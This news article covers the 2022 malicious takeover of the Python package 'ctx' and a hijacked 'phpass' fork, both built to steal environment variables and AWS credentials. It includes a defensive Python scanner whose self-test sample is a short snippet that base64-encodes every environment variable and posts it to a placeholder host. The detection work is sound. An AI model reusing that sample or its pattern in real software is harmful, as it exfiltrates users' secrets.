Cybersecurity researchers at Sonatype have detected that a recent attack on the popular Python package ‘ctx’ resulted in a legitimate version being replaced by a malicious one. The malware is programmed to let attackers harvest credentials used to access AWS.
Moreover, a forked PHP project known as “phpass” was compromised with an identical malicious payload in a repo hijacking attack. Ctx is a Python package that averages over 22,000 downloads per week and provides developers with a simple but complete dict/object combination.
Sonatype-2022-3060 is the identifier assigned to the compromised versions of “ctx”. Packagist, for its part, has already contained the compromised ‘phpass’ versions.
Over the course of its lifetime, the PHPass framework has been downloaded more than 2.5 million times through the Packagist repository. However, the number of downloads of the malicious versions is believed to be considerably smaller.
‘ctx’ Replaced with Malware
On the PyPI registry, the latest version of the Ctx package, 0.1.2, showed a publication date of December 19, 2014, until this week, as shown in the image below.
In addition, newer versions containing malicious code appeared this week, including 0.2.2, 0.2.6, and above.
As of May 21, 2022, the “ctx” version 0.1.2 on the PyPI registry had been replaced with an altered build containing the code shown above, which carries the contents of this file.
The simplistic code enumerates your environment variables, applies base64 encoding to them, and uploads them to the attacker’s endpoint.
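As an added defensive check (example code written for this article, not code from Sonatype, ctx or phpass), the script below uses Python’s `ast` module to flag source files that combine the three traits described above: enumerating `os.environ`, base64-encoding the result, and making an outbound network call. It assumes the audited package is installed in the current interpreter; the two sample modules at the end are constructed for the self-test and are not the real payload.

```python
import ast
from importlib import metadata
from pathlib import Path

# Attribute names that indicate an outbound HTTP call (urllib / requests style).
NETWORK_CALLS = {"urlopen", "Request", "urlretrieve", "post", "get", "put", "request"}

class _Finder(ast.NodeVisitor):
    reads_environ = encodes_b64 = network = False  # flipped per instance when seen

    def visit_Attribute(self, node):
        if isinstance(node.value, ast.Name) and node.value.id == "os" and node.attr == "environ":
            self.reads_environ = True   # os.environ read or enumerated
        if node.attr in ("b64encode", "urlsafe_b64encode"):
            self.encodes_b64 = True     # base64 encoding of the harvested data
        if node.attr in NETWORK_CALLS:
            self.network = True         # upload to a remote endpoint
        self.generic_visit(node)

def audit_source(source, filename="<module>"):
    """Return the indicators found in one Python source, in a fixed order."""
    finder = _Finder()
    finder.visit(ast.parse(source, filename=filename))
    checks = ((finder.reads_environ, "reads os.environ"),
              (finder.encodes_b64, "base64 encoding"),
              (finder.network, "network call"))
    return [label for flag, label in checks if flag]

def is_suspicious(source):
    """All three indicators together match the payload shape described above."""
    return len(audit_source(source)) == 3

def audit_installed(dist_name):
    """Scan every .py file shipped by an installed distribution, e.g. 'ctx'."""
    hits = {}
    for entry in metadata.files(dist_name) or []:
        if entry.suffix == ".py":
            path = Path(entry.locate())
            found = audit_source(path.read_text(encoding="utf-8", errors="replace"), str(path))
            if len(found) == 3:
                hits[str(path)] = found
    return hits

# Constructed samples for a self-test; neither is the real ctx or phpass code.
BENIGN = "class Ctx(dict):\n    def __getattr__(self, key):\n        return self[key]\n"
SUSPICIOUS = ("import os, base64, urllib.request\n"
              "def run():\n"
              "    blob = base64.b64encode(str(dict(os.environ)).encode())\n"
              "    urllib.request.urlopen('https://example.invalid/', data=blob)\n")
```

Run `audit_installed("ctx")` (or any other distribution name) in the environment you want to check; a non-empty result lists the files that show all three traits and deserve manual review. A heuristic like this catches the shape of this payload, not every possible variant.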
It seems several Reddit users noticed this incident and report that they have already flagged the malicious versions to the PyPI registry.
Even if you believe you are using the safe version 0.1.2, the copy currently served by PyPI appears to contain malicious code, as caught today, so it would be prudent to exercise due diligence and inspect what is actually included in your application.
‘PHPass’ Packagist project also compromised
The ‘PHPass’ Packagist project has also been compromised, through a hijacked fork of the PHP repository. Both attacks appear to target developers’ AWS credentials, and both do so by stealing environment variables.
Another malicious version of ‘Ctx’ targets all available environment variables. It looks like the malicious ‘phpass’ code has been on GitHub for 5 days, with commits referencing that endpoint.
Moreover, Sonatype states that ‘hautelook/phpass’ was not widely installed, which is why the problem has been contained.
Several open-source repositories are crucial components of the software supply chain. Maven, NPM, Packagist, PyPI, and RubyGems are among the most popular.